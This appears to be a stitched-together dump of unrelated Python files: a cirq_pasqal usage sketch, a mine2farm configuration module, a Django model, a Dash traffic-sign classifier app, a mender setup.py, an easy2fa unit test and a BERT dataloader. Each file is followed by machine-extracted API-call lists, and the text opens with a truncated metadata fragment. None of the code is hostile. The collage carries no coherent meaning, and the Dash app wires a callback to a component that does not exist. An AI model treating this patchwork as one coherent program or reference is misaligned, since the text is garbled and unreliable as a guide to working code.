** 2 + (p.col - q.col) ** 2)'], {}), '((p.row - q.row) ** 2 + (p.col - q.col) ** 2)\n', (10385, 10430), True, 'import numpy as np\n')]
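A small usage sketch for PasqalVirtualDevice; the qubit layout and control radius are illustrative, and it assumes CZ is accepted by the device gateset, consistent with the controlled_gateset defined above.

import cirq
from cirq_pasqal import TwoDQubit, PasqalVirtualDevice

qubits = [TwoDQubit(0, 0), TwoDQubit(0, 1), TwoDQubit(1, 0)]
device = PasqalVirtualDevice(control_radius=2.0, qubits=qubits)

print(device.minimal_distance())                          # 1.0
device.validate_operation(cirq.CZ(qubits[0], qubits[1]))  # within control_radius: passes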
# -*- coding: utf-8 -*- from enum import Enum, IntEnum, unique import os APP_NAME = "mine2farm" NETWORK_NAME = "CenterAxis" LOG_LEVEL_CONSOLE = "WARNING" LOG_LEVEL_FILE = "INFO" APP_FOLDER = os.getenv("JESA_MINE2FARM_HOME", "C:/GitRepos/mine2farm/") LOG_FOLDER = APP_FOLDER + "app/log/" LOG_FILE = "%(asctime)_" + APP_NAME + ".log" OUTPUT_FOLDER = "%s%s" % (APP_FOLDER, "outputs/") CANVAS_URL = "http://127.0.0.1/canvas.xlsm" # DB DB_NAME = None DB_HOST = "172.29.161.208" DB_PORT = 5006 DATA_SERVICE_ADD = "172.29.161.208" DATA_SERVICE_PORT = 5001 # Results DB_RESULT_NAME = "%s_results" % DB_NAME if DB_NAME is not None else None DB_DETAILED_RESULT_COLLECTION_NAME = "detailed" DB_GLOBAL_RESULT_COLLECTION_NAME = "global" DB_GLOBAL_BEST_RESULT_COLLECTION_NAME = "global_best" DB_DETAILED_BEST_RESULT_COLLECTION_NAME = "detailed_best" DB_SENSITIVITY_COLLECTION_NAME = "sensitivity" RESULT_BATCHES_SIZE = 25 HEAD_DATA_BITS = 17 DB_NAME_BITS = 20 RANDOMIZE_RESULTS = False # RabbitMQ RABBITMQ_SERVER = "localhost" RABBITMQ_SIMULATOR_QUEUE_NAME = "SIMULATE" RABBITMQ_CYCLE = 3 RABBITMQ_DETAILED_RESULT_QUEUE_NAME = "SAVE_DETAIL" RABBITMQ_GLOBAL_RESULT_QUEUE_NAME = "SAVE_GLOBAL" RABBITMQ_MAX_WORKER = RABBITMQ_CYCLE RABBITMQ_PATH = "C:\\Program Files\\RabbitMQ Server\\rabbitmq_server-3.8.1\\sbin" # Memcached MEMCACHED_SERVER = 'localhost' MEMCACHED_PORT = 11211 # Dashboard DB_LOAD_FROM_SERVICE = True # Monitoring MONITORING_APP_NAME = "mine2farm_monitor" MONITORING_SERVER = "172.29.161.208" MONITORING_PORT = 5002 MONITORING_DB_NAME = "task_history" MONITORING_COLLECTION_HISTORY_NAME = "task" MONITORING_COLLECTION_HISTORY_BEST_NAME = "best_scenarios_history" MONITORING_STEP = 1 MONITORING_NB_PAGE = 10 # Mongodb-bi MONGODB_BI_PATH = "C:\\Program Files\\MongoDB\\Connector for BI\\2.13\\bin" # Mongodb MONGO_SERVER_PATH = "C:\\Program Files\\MongoDB\\Server\\4.0\\bin" # params LOGISTICS_LP = False MODE_DEBUG = False GRANUL_RELAX = False class HTML_STATUS(IntEnum): ERROR = -1 OK = 0 # Model MONIKER_SEPARATOR = "/" WACC = 0.1 T0 = 2020 TMAX = 2031 class PriceParams(Enum): WACC = 0 TENOR = 1 VOLUME = 2 class PipelineType(Enum): COMMON = 0 PRODUCER = 1 TRANSPORT = 2 BALANCE = 3 PRICE = 4 SALES = 5 @unique class PipelineLayer(IntEnum): UNDEFINED = -1 MINE = 0 BENEFICIATION = 1 SAP = 2 PAP = 3 GRANULATION = 4 LOGISTICS = 5 RAW_MATERIALS = 8 COMMON = 9 SALES_PLAN = 10 MINE_BENEFICIATION = 11 UNIT_CONVERSION_MATRIX = 12 PIPELINE_SCHEMA = { PipelineLayer.COMMON: { "type": PipelineType.COMMON, "dico": ["location", "opex", "unit", "currency", "output", "names", "products"] }, PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "dico": ["mine.name", "mine.extraction", "mine.quality", "mine.capex"], "options": "mining_options", "production": "mining_specific_production", "opex": "mining_opex___specific_consumptions", "capex": "mining_capex", "priority_mines": "prioritymines" }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "dico": ["beneficiation.name", "beneficitation.process", "beneficitation.quality", "beneficitation.capex"], "options": "beneficiation_options", "production": "beneficiation_production", "opex": "beneficiation_opex___specific_consumptions", "capex": "beneficiation_capex" }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "dico": ["sap.name", "sap.process", "sap.product", "sap.capex", "sap.capacity[kt]"], "options": "sap___power_plant_options", "production": "sap___power_plant_production", "opex": "sap___power_plant_opex___specific_consumptions", "capex": "sap___power_plant_capex", 
"product_type": "sap.product" }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "dico": ["pap.name", "pap.process", "pap.product", "pap.capex", "pap.size[kt]", "pap.input"], "options": "pap_options", "production": "pap_production", "opex": "pap_opex___specific_consumptions", "capex": "pap_capex", "product_type": "pap.product" }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "dico": ["granulation.name", "granulation.process", "granulation.product", "granulation.capex", "granulation.input"], "options": "granulation_options", "production": "granulation_production", "opex": "granulation_opex", "capex": "granulation_capex" }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "dico": ["logistics.name", "logistics.process", "logistics.product", "logistics.capex"], "options": "logistics_options", "production": None, "opex": "logistics_opex", "capex": "logistics_capex" }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "data": "raw_materials" }, PipelineLayer.SALES_PLAN: { "type": PipelineType.SALES, "data": "sales_plan" }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": PipelineType.COMMON, "data": "conv_matrix" }, } SUPPLY_CHAIN = "mine2port" DEPARTURE_ARRIVAL = {SUPPLY_CHAIN: (PipelineLayer.MINE), "sap2pap": (PipelineLayer.SAP, PipelineLayer.PAP)} COMBO_NODES = { PipelineLayer.MINE_BENEFICIATION: { "url": "mining_wp_connections", "upstream_layer": PipelineLayer.MINE, "downstream_layer": PipelineLayer.BENEFICIATION } } COMBO_NODES_SEPARATION = "--" class FunctionType(Enum): COST_PV = 0 CASH_COST = 1 FULL_COST = 2 class ScenarioGeneratorType(IntEnum): FROM_PATHS = 0 FROM_OPTIONS = 1 SPECIFIC_SCENARIOS = 2 SCENARIO_GEN_TYPE = ScenarioGeneratorType.FROM_OPTIONS PIPELINE_METADATA = { PipelineLayer.MINE: { "type": PipelineType.PRODUCER, "production": ["Name", "Extraction", "Quality", "Unit"], "opex": ["Name", "Extraction", "Capacity", "Item", "Unit"], "capex": ["Name", "Extraction", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.BENEFICIATION: { "type": PipelineType.PRODUCER, "production": ["Process", "InputQuality", "OutputQuality", "Humidity", "Unit"], "opex": ["Process", "InputQuality", "OutputQuality", "Item", "Unit"], "capex": ["Name", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.SAP: { "type": PipelineType.PRODUCER, "production": ["Location", "Process", "Product", "Unit"], "opex": ["Location", "Process", "Item", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.PAP: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "Process", "Capacity", "Input", "Item", "Product", "Unit"], "capex": ["Location", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.GRANULATION: { "type": PipelineType.PRODUCER, "production": ["Process", "Input", "Product", "Unit"], "opex": ["Location", "ProductionSite", "Process", "Capacity", "Product", "Item", "Unit"], "capex": ["Location", "ProductionSite", "Product", "Process", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.LOGISTICS: { "type": PipelineType.TRANSPORT, "opex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit"], "capex": ["Upstream", "Downstream", "Method", "Product", "Capacity", "Item", "Unit", "CAPEX"] }, PipelineLayer.RAW_MATERIALS: { "type": PipelineType.PRICE, "columns": ["Item", "Unit"] }, PipelineLayer.SALES_PLAN: { "type": PipelineType.PRICE, "columns": ["Type", "Product", "Unit"] }, PipelineLayer.UNIT_CONVERSION_MATRIX: { "type": 
PipelineType.COMMON, "columns": ["Initial Unit", "Uniform Unit", "Conversion Rate"] }, } class ShuffleLevel(IntEnum): UNDEFINED = 0 SHUFFLE_WITHOUT_PERM = 1 SHUFFLE_WITH_PERMUTATIONS = 2 SHUFFLE_WITH_PERMUTATIONS_WITH_FILTERS = 3 SHUFFLE_WITH_UNNAMED = 4 SHUFFLE_LEVELS = { PipelineLayer.MINE: ShuffleLevel.UNDEFINED, PipelineLayer.BENEFICIATION: ShuffleLevel.UNDEFINED, PipelineLayer.SAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.PAP: ShuffleLevel.SHUFFLE_WITH_UNNAMED, PipelineLayer.GRANULATION: ShuffleLevel.UNDEFINED, PipelineLayer.LOGISTICS: ShuffleLevel.UNDEFINED, PipelineLayer.MINE_BENEFICIATION: ShuffleLevel.UNDEFINED }
[ "os.getenv" ]
[((195, 253), 'os.getenv', 'os.getenv', (['"""JESA_MINE2FARM_HOME"""', '"""C:/GitRepos/mine2farm/"""'], {}), "('JESA_MINE2FARM_HOME', 'C:/GitRepos/mine2farm/')\n", (204, 253), False, 'import os\n')]
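The configuration above is consumed by looking layers up in PIPELINE_SCHEMA. A small illustrative lookup (assuming the config module has been imported) collects the producer layers and the sheet names their CAPEX tables come from, and shows a moniker built with the configured separator; the route node names are made up.

producer_capex_sheets = {
    layer.name: schema["capex"]
    for layer, schema in PIPELINE_SCHEMA.items()
    if schema["type"] == PipelineType.PRODUCER
}
print(producer_capex_sheets)
# {'MINE': 'mining_capex', 'BENEFICIATION': 'beneficiation_capex', ...}

# Monikers are joined with the configured separator; the node names here are hypothetical.
moniker = MONIKER_SEPARATOR.join(["MINE", "Benguerir", "BENEFICIATION", "WashPlant"])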
from django.db import models # Create your models here. class Destination(models.Model) : name = models.CharField(max_length = 100) img = models.ImageField(upload_to = 'pics') desc = models.TextField() price = models.IntegerField() offer = models.BooleanField(default = False) class News() : id : int img : str date : int month : str headline : str category : str desc : str
[ "django.db.models.TextField", "django.db.models.IntegerField", "django.db.models.BooleanField", "django.db.models.ImageField", "django.db.models.CharField" ]
[((103, 135), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (119, 135), False, 'from django.db import models\n'), ((148, 183), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""pics"""'}), "(upload_to='pics')\n", (165, 183), False, 'from django.db import models\n'), ((197, 215), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (213, 215), False, 'from django.db import models\n'), ((228, 249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (247, 249), False, 'from django.db import models\n'), ((262, 296), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (281, 296), False, 'from django.db import models\n')]
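Typical ORM usage for the Destination model above; it assumes the app is installed and migrated, runs inside a Django context (e.g. manage.py shell), and the app module name in the import is a guess.

from travello.models import Destination  # app/module name assumed

d = Destination(name="Agadir", desc="Beach resort", price=1200, offer=True)
d.img = "pics/agadir.jpg"   # illustrative path under the 'pics' upload directory
d.save()

discounted = Destination.objects.filter(offer=True).order_by("price")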
import base64 import io import dash import dash_core_components as dcc import dash_html_components as html import dash_bootstrap_components as dbc from dash.dependencies import Input, Output import numpy as np import tensorflow as tf from PIL import Image from constants import CLASSES import yaml with open('app.yaml') as yaml_data : params = yaml.safe_load(yaml_data) IMAGE_WIDTH = params['IMAGE_WIDTH'] IMAGE_HEIGHT = params['IMAGE_HEIGHT'] PATH_MODEL = params['PATH_MODEL'] # Load DNN model classifier = tf.keras.models.load_model(PATH_MODEL) def classify_image(image, model, image_box=None): """Classify image by model Parameters ---------- content: image content model: tf/keras classifier Returns ------- class id returned by model classifier """ images_list = [] image = image.resize((IMAGE_WIDTH, IMAGE_HEIGHT), box=image_box) # box argument clips image to (x1, y1, x2, y2) image = np.array(image) images_list.append(image) return model.predict_classes(np.array(images_list)) app = dash.Dash('Traffic Signs Recognition', external_stylesheets=[dbc.themes.BOOTSTRAP]) pre_style = { 'whiteSpace': 'pre-wrap', 'wordBreak': 'break-all', 'whiteSpace': 'normal' } # Define application layout navbar = dbc.NavbarSimple( children=[ dbc.DropdownMenu( children=[ dbc.DropdownMenuItem('Réseau de Neurones', header=True), dbc.DropdownMenuItem('SVM', href="#"), ], nav=True, in_navbar=True, label='Modèle', ), ], brand="Menu", brand_href="#", color= "#d90054", dark=True ) cards = html.Div( [ dbc.Card( dbc.CardBody( [ html.H5("Présentation", className="card-title"), html.P( [ 'Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester.', ], className='card-text', ), ] ), className='w-75 mb-3', color='#f1cbd1', outline='Black', style={ 'margin-top': '75px', 'margin-left': '185px'}, ), ] ) app.layout = html.Div([ html.Div([navbar]), html.Div(cards), dcc.Upload( id='bouton-chargement', children=html.Div([ 'Cliquer-déposer ou ', html.A('sélectionner une image') ]), style={ 'width': '50%', 'height': '60px', 'lineHeight': '60px', 'borderWidth': '1px', 'borderStyle': 'dashed', 'borderRadius': '5px', 'textAlign': 'center', 'margin-top': '75px', 'margin-left': '370px', } ), html.Div(id='mon-image'), html.Div(id='ma-zone-resultat') ]) @app.callback(Output('mon-image', 'children'), [Input('bouton-chargement', 'contents')]) def update_output(contents): if contents is not None: content_type, content_string = contents.split(',') if 'image' in content_type: image = Image.open(io.BytesIO(base64.b64decode(content_string))) predicted_class = classify_image(image, classifier)[0] return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src=contents, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), #html.Div('Raw Content'), #html.Pre(contents, style=pre_style) ]) else: try: # Décodage de l'image transmise en base 64 (cas des fichiers ppm) # fichier base 64 --> image PIL image = Image.open(io.BytesIO(base64.b64decode(content_string))) # image PIL --> conversion PNG --> buffer mémoire buffer = io.BytesIO() image.save(buffer, format='PNG') # buffer mémoire --> image base 64 buffer.seek(0) img_bytes = buffer.read() content_string = base64.b64encode(img_bytes).decode('ascii') # Appel du modèle de classification predicted_class = classify_image(image, classifier)[0] # Affichage de l'image return html.Div([ html.Hr(style={'margin-top': '75px'}), html.Img(src='data:image/png;base64,' + content_string, style={'margin-left': '750px'}), html.H4('Classe prédite : {}'.format(CLASSES[predicted_class]), style={'textAlign': 'center'}), html.Hr(), ]) except: return html.Div([ html.Hr(), html.Div('Uniquement des images svp : {}'.format(content_type)), html.Hr(), html.Div('Raw Content'), html.Pre(contents, style=pre_style) ]) # Manage interactions with callbacks @app.callback( Output(component_id='ma-zone-resultat', component_property='children'), [Input(component_id='mon-champ-texte', component_property='value')] ) def update_output_div(input_value): return html.H3('Valeur saisie ici "{}"'.format(input_value)) # Start the application if __name__ == '__main__': app.run_server(debug=True)
[ "dash_bootstrap_components.DropdownMenuItem", "dash.dependencies.Output", "base64.b64encode", "io.BytesIO", "dash_html_components.H5", "base64.b64decode", "dash.dependencies.Input", "dash_html_components.Pre", "yaml.safe_load", "numpy.array", "dash_html_components.Div", "tensorflow.keras.models.load_model", "dash_html_components.Img", "dash_html_components.Hr", "dash_html_components.P", "dash.Dash", "dash_html_components.A" ]
[((524, 562), 'tensorflow.keras.models.load_model', 'tf.keras.models.load_model', (['PATH_MODEL'], {}), '(PATH_MODEL)\n', (550, 562), True, 'import tensorflow as tf\n'), ((1083, 1171), 'dash.Dash', 'dash.Dash', (['"""Traffic Signs Recognition"""'], {'external_stylesheets': '[dbc.themes.BOOTSTRAP]'}), "('Traffic Signs Recognition', external_stylesheets=[dbc.themes.\n BOOTSTRAP])\n", (1092, 1171), False, 'import dash\n'), ((353, 378), 'yaml.safe_load', 'yaml.safe_load', (['yaml_data'], {}), '(yaml_data)\n', (367, 378), False, 'import yaml\n'), ((974, 989), 'numpy.array', 'np.array', (['image'], {}), '(image)\n', (982, 989), True, 'import numpy as np\n'), ((3345, 3376), 'dash.dependencies.Output', 'Output', (['"""mon-image"""', '"""children"""'], {}), "('mon-image', 'children')\n", (3351, 3376), False, 'from dash.dependencies import Input, Output\n'), ((5671, 5741), 'dash.dependencies.Output', 'Output', ([], {'component_id': '"""ma-zone-resultat"""', 'component_property': '"""children"""'}), "(component_id='ma-zone-resultat', component_property='children')\n", (5677, 5741), False, 'from dash.dependencies import Input, Output\n'), ((1052, 1073), 'numpy.array', 'np.array', (['images_list'], {}), '(images_list)\n', (1060, 1073), True, 'import numpy as np\n'), ((2702, 2720), 'dash_html_components.Div', 'html.Div', (['[navbar]'], {}), '([navbar])\n', (2710, 2720), True, 'import dash_html_components as html\n'), ((2731, 2746), 'dash_html_components.Div', 'html.Div', (['cards'], {}), '(cards)\n', (2739, 2746), True, 'import dash_html_components as html\n'), ((3265, 3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""mon-image"""'}), "(id='mon-image')\n", (3273, 3289), True, 'import dash_html_components as html\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""ma-zone-resultat"""'}), "(id='ma-zone-resultat')\n", (3303, 3326), True, 'import dash_html_components as html\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['"""bouton-chargement"""', '"""contents"""'], {}), "('bouton-chargement', 'contents')\n", (3398, 3431), False, 'from dash.dependencies import Input, Output\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '"""mon-champ-texte"""', 'component_property': '"""value"""'}), "(component_id='mon-champ-texte', component_property='value')\n", (5753, 5813), False, 'from dash.dependencies import Input, Output\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4481, 4483), False, 'import io\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['"""Présentation"""'], {'className': '"""card-title"""'}), "('Présentation', className='card-title')\n", (1826, 1866), True, 'import dash_html_components as html\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['["Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ]'], {'className': '"""card-text"""'}), '([\n "Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. 
En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ], className=\'card-text\')\n', (1894, 2301), True, 'import dash_html_components as html\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (3645, 3661), False, 'import base64\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (3784, 3814), True, 'import dash_html_components as html\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': "{'margin-left': '750px'}"}), "(src=contents, style={'margin-left': '750px'})\n", (3840, 3886), True, 'import dash_html_components as html\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (4023, 4025), True, 'import dash_html_components as html\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""Réseau de Neurones"""'], {'header': '(True)'}), "('Réseau de Neurones', header=True)\n", (1431, 1466), True, 'import dash_bootstrap_components as dbc\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""SVM"""'], {'href': '"""#"""'}), "('SVM', href='#')\n", (1504, 1521), True, 'import dash_bootstrap_components as dbc\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['"""sélectionner une image"""'], {}), "('sélectionner une image')\n", (2885, 2911), True, 'import dash_html_components as html\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (4360, 4376), False, 'import base64\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\n', (4706, 4717), False, 'import base64\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (4957, 4987), True, 'import dash_html_components as html\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': "('data:image/png;base64,' + content_string)", 'style': "{'margin-left': '750px'}"}), "(src='data:image/png;base64,' + content_string, style={\n 'margin-left': '750px'})\n", (5017, 5101), True, 'import dash_html_components as html\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5241, 5243), True, 'import dash_html_components as html\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5345, 5347), True, 'import dash_html_components as html\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5461, 5463), True, 'import dash_html_components as html\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['"""Raw Content"""'], {}), "('Raw Content')\n", (5509, 5524), True, 'import dash_html_components as html\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\n', (5554, 5581), True, 'import dash_html_components as html\n')]
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import setuptools
import re

VERSIONFILE = "src/mender/_version.py"
version_string_line = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(VSRE, version_string_line, re.M)
if match:
    version_string = match.group(1)
else:
    raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))

with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="mender-python-client-mendersoftware",
    version=version_string,
    license="Apache 2.0",
    author="Mendersoftware",
    author_email="<EMAIL>",
    description="A Python implementation of the Mender client interface",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/mendersoftware/mender-python-client",
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: Apache Software License",
        "Operating System :: OS Independent",
    ],
    keywords=["mender", "OTA", "updater"],
    packages=setuptools.find_packages(where="src"),
    install_requires=["cryptography", "requests", "msgpack", "websockets"],
    entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]},
    package_dir={"": "src"},
    python_requires=">=3.6",
    zip_safe=False,
    include_package_data=True,
)
[ "setuptools.find_packages", "re.search" ]
[((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\n', (790, 823), False, 'import re\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '"""src"""'}), "(where='src')\n", (1711, 1724), False, 'import setuptools\n')]
# --------------
# Importing header files
import numpy as np
import pandas as pd
from scipy.stats import mode

# code starts here
bank = pd.read_csv(path)

categorical_var = bank.select_dtypes(include='object')
print(categorical_var)

numerical_var = bank.select_dtypes(include='number')
print(numerical_var)

banks = bank.drop(columns=['Loan_ID'])
bank_mode = banks.mode()
banks = banks.fillna(bank_mode.iloc[0])
print(banks.isnull().sum())

avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'],
                                values='LoanAmount', aggfunc='mean')
print(avg_loan_amount)

loan_approved_se = banks[(banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y")]
loan_approved_nse = banks[(banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y")]

percentage_se = (len(loan_approved_se) / 614) * 100
percentage_nse = (len(loan_approved_nse) / 614) * 100

# loan amount term
loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x) / 12)
big_loan_term = len(loan_term[loan_term >= 25])
print(big_loan_term)

columns_to_show = ['ApplicantIncome', 'Credit_History']
loan_groupby = banks.groupby(['Loan_Status'])[columns_to_show]

# Check the mean value
mean_values = loan_groupby.agg([np.mean])
print(mean_values)

# code ends here
[ "pandas.pivot_table", "pandas.read_csv" ]
[((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\n', (161, 167), True, 'import pandas as pd\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': "['Gender', 'Married', 'Self_Employed']", 'values': '"""LoanAmount"""', 'aggfunc': '"""mean"""'}), "(banks, index=['Gender', 'Married', 'Self_Employed'], values=\n 'LoanAmount', aggfunc='mean')\n", (503, 598), True, 'import pandas as pd\n')]
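As a side note (not part of the original exercise): the pd.pivot_table call in the snippet above computes the same per-group averages as a plain groupby/mean, which some readers may find easier to follow; the groupby form returns a Series rather than a pivoted DataFrame.

# Equivalent averages to the pd.pivot_table call above: group by the three
# categorical columns and take the mean of LoanAmount.
avg_loan_amount_alt = (
    banks.groupby(['Gender', 'Married', 'Self_Employed'])['LoanAmount'].mean()
)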
from unittest import TestCase
from unittest.mock import patch

from easy2fa import cli


class TestCheckInput(TestCase):
    @patch('builtins.input')
    def test_default(self, mock_input):
        mock_input.return_value = ''
        self.assertEquals(cli.check_input('prompt', default='one'), 'one')

        mock_input.return_value = 'two'
        self.assertEquals(cli.check_input('prompt', default='one'), 'two')

    @patch('builtins.input')
    @patch('builtins.print')
    def test_assertions(self, mock_print, mock_input):
        def assertion(value):
            if value not in ['yes', 'no']:
                return 'use yes or no'

        mock_input.side_effect = ['input', '', 'no']
        self.assertEquals(cli.check_input('prompt', assertion=assertion), 'no')
        mock_print.assert_called_with('\tInvalid input: use yes or no')
[ "easy2fa.cli.check_input", "unittest.mock.patch" ]
[((126, 149), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (131, 149), False, 'from unittest.mock import patch\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (428, 446), False, 'from unittest.mock import patch\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['"""builtins.print"""'], {}), "('builtins.print')\n", (457, 475), False, 'from unittest.mock import patch\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (268, 293), False, 'from easy2fa import cli\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (383, 408), False, 'from easy2fa import cli\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'assertion': 'assertion'}), "('prompt', assertion=assertion)\n", (738, 769), False, 'from easy2fa import cli\n')]
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler

from bert_finetuning.data import GermanData


class GermanDataLoader:
    def __init__(
        self,
        data_paths,
        model_name,
        do_cleansing,
        max_sequence_length,
        batch_size=8,
        dataset_cls=GermanData,
    ):
        self.german_data = dataset_cls(
            data_paths,
            model_name,
            max_sequence_length=max_sequence_length,
            do_cleansing=do_cleansing,
        )

        self.batch_size = batch_size
        self.create_loaders()

    def create_loaders(self):
        """
        Create Torch dataloaders for data splits
        """
        self.german_data.text_to_tensors()
        print("creating dataloaders")

        train_data = TensorDataset(
            self.german_data.train_inputs,
            self.german_data.train_masks,
            self.german_data.train_labels,
        )
        train_sampler = RandomSampler(train_data)
        self.train_dataloader = DataLoader(
            train_data, sampler=train_sampler, batch_size=self.batch_size
        )

        validation_data = TensorDataset(
            self.german_data.validation_inputs,
            self.german_data.validation_masks,
            self.german_data.validation_labels,
        )
        validation_sampler = SequentialSampler(validation_data)
        self.validation_dataloader = DataLoader(
            validation_data, sampler=validation_sampler, batch_size=self.batch_size
        )

        test_data = TensorDataset(
            self.german_data.test_inputs,
            self.german_data.test_masks,
            self.german_data.test_labels,
        )
        test_sampler = SequentialSampler(test_data)
        self.test_dataloader = DataLoader(
            test_data, sampler=test_sampler, batch_size=self.batch_size
        )

        print("finished creating dataloaders")


"""
** FOR DEBUGGING **

if __name__ == "__main__":
    ## define data paths
    germeval_data_paths = {
        "train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
        "dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
        "test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
    }

    hasoc_german_data_paths = {
        "train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
        "dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
        "test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
    }

    ## create dataloaders
    print("creating germeval dataloaders...")
    germ_eval_dataloader = GermanDataLoader(germeval_data_paths)

    print("creating hasoc dataloaders...")
    hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths)
"""
[ "torch.utils.data.RandomSampler", "torch.utils.data.SequentialSampler", "torch.utils.data.TensorDataset", "torch.utils.data.DataLoader" ]
